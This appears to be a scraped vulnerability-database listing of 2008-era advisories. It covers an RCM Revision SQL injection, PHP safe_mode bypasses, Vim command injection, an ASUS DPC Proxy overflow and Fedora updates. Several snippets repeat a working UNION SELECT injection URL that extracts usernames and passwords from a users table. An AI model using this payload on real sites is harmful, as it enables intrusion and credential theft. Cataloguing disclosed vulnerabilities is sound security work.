rcm-sql.txt

RCM Revision Web Development products.php SQL Injection Vulnerability by D3m0n a.k.a Niiub Home: www.bl4ck-b0x.info niiubatbl4ck-b0x.info Exploit: products.php?cat=-1%20union%20select%201,2,3,4,concatws0x3a,username, userpassword,6%20from%20users/ OR...

RCM Revision Web Development (products.php) SQL Injection Vulnerability

No description provided by source. RCM Revision Web Development products.php SQL Injection Vulnerability by D3m0n a.k.a Niiub Home: www.bl4ck-b0x.info niiubatbl4ck-b0x.info Exploit: products.php?cat=-1%20union%20select%201,2,3,4,concatws0x3a,username, userpassword,6%20from%20users/ OR...

RCM Revision Web Development - 'products.php' SQL Injection

RCM Revision Web Development products.php SQL Injection Vulnerability by D3m0n a.k.a Niiub Home: www.bl4ck-b0x.info niiubatbl4ck-b0x.info Exploit: products.php?cat=-1%20union%20select%201,2,3,4,concatws0x3a,username, userpassword,6%20from%20users/ OR...

RCM Revision Web Development (products.php) SQL Inject Vulnerability

Exploit for unknown platform in category web applications ======================================================================= RCM Revision Web Development products.php SQL Injection Vulnerability ======================================================================= RCM Revision Web...

RCM Revision Web Development - products.php SQL Injection

RCM Revision Web Development - products.php SQL Injection RCM Revision Web Development products.php SQL Injection Vulnerability by D3m0n a.k.a Niiub Home: www.bl4ck-b0x.info niiubatbl4ck-b0x.info Exploit: products.php?cat=-1%20union%20select%201,2,3,4,concatws0x3a,username,...

IBM JDK: Integer overflow in IBM JDK's ICC profile parser

REJECTED CVE This CVE has been rejected. This candidate is a duplicate of CVE-2007-2788. Note: All CVE users should reference CVE-2007-2788 instead of this candidate...

[SECURITY] Fedora 8 Update: xemacs-packages-extra-20070427-2.fc8

XEmacs is a highly customizable open source text editor and application development system. It is protected under the GNU General Public License and related to other versions of Emacs, in particular GNU Emacs. Its emphasis is on modern graphical user interface support and an open software...

[SECURITY] Fedora 9 Update: xemacs-packages-extra-20070427-2.fc9

XEmacs is a highly customizable open source text editor and application development system. It is protected under the GNU General Public License and related to other versions of Emacs, in particular GNU Emacs. Its emphasis is on modern graphical user interface support and an open software...

PHP 5 posix_access()函数绕过safe_mode限制漏洞

BUGTRAQ ID: 29797 CVECAN ID: CVE-2008-2665 PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。 PHP 5的posixaccess函数在处理用户数据时存在漏洞，远程攻击者可能利用此漏洞绕过检查过滤。 在PHP的posixaccess函数中： - --- PHPFUNCTIONposixaccess long mode = 0; int filenamelen, ret; char filename, path; if zendparseparametersZENDNUMARGS TSRMLSCC, "s|l",...

PHP chdir()和ftok()函数绕过safe_mode限制漏洞

BUGTRAQ ID: 29796 CVECAN ID: CVE-2008-2666 PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。 PHP的chdir和ftok函数中存在多个绕过safemode限制漏洞。 在chdir函数中： - --- PHPFUNCTIONchdir char str; int ret, strlen; if zendparseparametersZENDNUMARGS TSRMLSCC, "s", &str, &strlen == FAILURE RETURNFALSE; if PGsafemode &&...

Vim多个Shell命令注入漏洞

BUGTRAQ ID: 29715 VIM是一款免费开放源代码文本编辑器，可使用在Unix/Linux操作系统下。 VIM的filetype.vim、tar.vim、zip.vim、xpm.vim、xpm2.vim、gzip.vim和netrw.vim脚本没有正确地转义传送给execute语句的文件名中的特殊字符，如果用户受骗打开了恶意文件的话，就可能导致向受影响系统注入并执行任意SHELL命令。 VIM Development Group VIM 7.1.314 VIM Development Group VIM 6.4 VIM Development Group...

GSC Privilege Escalation Exploit

Name: Michael Gray Website: www.ownerarium.net Contact: [email protected] Discovered Exploit: 06-05-2008 Vulnerable Software Title: GSC Vulnerable Version: = 2067 Severity: CRITICAL Website: http://www.getgsc.com Reported to vendor: Yes Actively exploited: Yes Exploit Discovery...

ASPilot Pilot Cart 7.3 - 'article' SQL Injection

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ Kings of injection | | // | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + Script Name : Pilot...

VisualSentinel 0.7 Cross Agent Scripting Vulnerability

VisualSentinel 0.7 Cross Agent Scripting Discovered by: Alfredo Panzera, Opencosmo Security Software vendor: http://www.opencosmo.com Date: 31-05-2008 Vulnerability: The vulnerability consists on inject javascript code falsify the user agent's attacker during an attack and then save in the log th...

ikiwiki -- cleartext passwords

The ikiwiki development team reports: Until version 2.48, ikiwiki stored passwords in cleartext in the userdb. That risks exposing all users' passwords if the file is somehow exposed. To pre-emtively guard against that, current versions of ikiwiki store password hashes using Eksblowfish...

ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow

/ Dreatica-FXP crew ---------------------------------------- Target : ASUS DPC Proxy 2.0.0.16/2.0.0.24 ---------------------------------------- Exploit : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit Exploit date : 02.04.2008 Exploit writer : Heretic2 [email protected] OS :...

[SECURITY] Fedora 9 Update: Django-0.96.2-1.fc9

Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY Don't Repeat Yourself principle...

[SECURITY] Fedora 8 Update: Django-0.96.2-1.fc8

Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY Don't Repeat Yourself principle...

[SECURITY] Fedora 7 Update: Django-0.96.2-1.fc7

Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY Don't Repeat Yourself principle...

Cosminexus Denial of Service Vulnerability

Overview JSSE Java Secure Socket Extension in Cosminexua Developer's Kit for Java may fall into a denial of service condition when it handles an improper SSL/TLS handshake request. An attacker could exploit this vulnerability and cause a denial of service on the systems that establish an SSL/TLS...